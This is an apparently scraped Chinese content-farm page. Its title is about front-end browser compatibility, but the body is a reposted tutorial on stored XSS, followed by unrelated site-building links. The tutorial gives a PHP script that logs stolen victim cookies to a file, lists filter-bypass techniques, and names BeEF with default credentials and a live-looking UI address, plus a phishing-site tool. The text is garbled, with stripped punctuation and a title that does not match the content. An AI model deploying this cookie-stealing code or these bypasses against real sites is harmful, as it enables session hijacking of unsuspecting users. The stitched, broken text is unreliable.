当前位置: 首页 > news >正文

网站前端浏览器兼容如何做公众号 微网站建设方案

网站前端浏览器兼容如何做,公众号 微网站建设方案,做安全防护信息的网站,滨湖区知名做网站价格XSS脚本#xff08;存储型xss获取肉鸡的cookies#xff09; 存储型XSS就是在能够提交上传的文本框中提交一些标签代码#xff0c;这段代码被插入到页面中#xff0c;肉鸡每次点击这个页面时都会有弹框弹出。#xff08;只要点击就会弹框#xff09; 反射性XSS顾名思义插入…XSS脚本存储型xss获取肉鸡的cookies 存储型XSS就是在能够提交上传的文本框中提交一些标签代码这段代码被插入到页面中肉鸡每次点击这个页面时都会有弹框弹出。只要点击就会弹框 反射性XSS顾名思义插入 vim /var/www/html/cookie_rec.php ?php $cookie $_GET[cookie]; $log fopen(cookie.txt,a); fwrite($log, $cookie . \n); fclose($log); ? 2、增加目录权限 chown -R www-data.www-data /var/www 3、访问靶机 4、之后当有人访问这个页面时就会有弹框 存储型Xss排查思路 1、首先依次排查标签是否被禁用script、img、iframe等 绕过思路 标签大小写 标签转义、双重转义、加密 替换关键字 使用编码十六进制、二次编码、Unicode编码 2、测试排查某些符号是否被禁用转义尖括号、引号、空格、等号 绕过思路 对符号进行编码 转义、双重转义、尖括号闭合 加密 使用注释 重音符来包含代码 内嵌TAB、换行符等分割攻击代码 3、检查xss的验证机制是通过前端验证或是后端验证、还是前后端均验证。 排查思路 查看HTML源码前端是否存在某些限制文本框长度、符号分割空格逗号等、标签禁用、符号禁用、标签符号过滤等JS或方法 使用burpsuite绕过前端发起请求 4、针对1、2、3过程的排查进行针对性的注入 常见注入 标签闭合 注释、字符转义 事件处理程序 编码 协议绕过 内嵌TAB、回车 参考https://www.freebuf.com/articles/web/153055.html BeEf工具的使用 注入的语句 账号密码beef : debian4eva UI地址http://139.198.21.183:8808/ui/authentication setookit制作钓鱼网站工具
http://www.sadfv.cn/news/93008/

相关文章:

  • 青岛做英文网站的公司网站可信认证在哪里做
  • 有全部公司的网站单页网站利润
  • 平面设计 网站推荐如何检测网站被搜索引擎惩罚了
  • 静态网站做301重定向曼联vs曼联直播
  • 网站邮箱怎么做的外贸网站优化哪家好
  • 网站怎么做效果更好深圳建设局网和住房网
  • 网站建设业务员提成做网站 接单
  • 建站语言有哪些温州seo优化网络推广
  • com的域名是指商业网站的域名.农林牧渔行业网站建设
  • 网站备案号在哪网站建设改版方案
  • 专业杭州网站建设网页设计基础课心得体会2000字
  • 做视频网站注意什么问题无锡seo培训
  • 门户网站开发模板直播小程序源码
  • 电子商务网站购物流程图ps做网站显示内容参考
  • 黑龙江中国建设监理协会网站沧州网站制作网站
  • 企业网站建设因素分析重庆建设工程安全网
  • php mysql 网站建设信专业广州网站建设
  • 开源网站有哪些肇庆搞产品网站的公司
  • 网站制作公司数据库管理排名甘肃嘉峪关建设局网站
  • 网站seo关键字优化WordPress好看的博客主题有哪些
  • 做视频的软件模板下载网站有哪些内容网上注册公司流程工商
  • 可以做翻译兼职的网站吗学校网站建设 分工
  • 做面食的网站wordpress cute主题
  • 长春市做网站推广免费的效果图设计软件
  • 网站建设一般多少钱要如何选择如何让网站速度快
  • 北京专业网站开发网站建设广告平台推广
  • 校园网站建设实施方案适合做网站背景音乐
  • 西安制作网站公司哪家好腾讯企业网页设计
  • 电商网站开发背景对于网站建设的体会
  • 南通网站建设案例电子商务网站建设论文3000字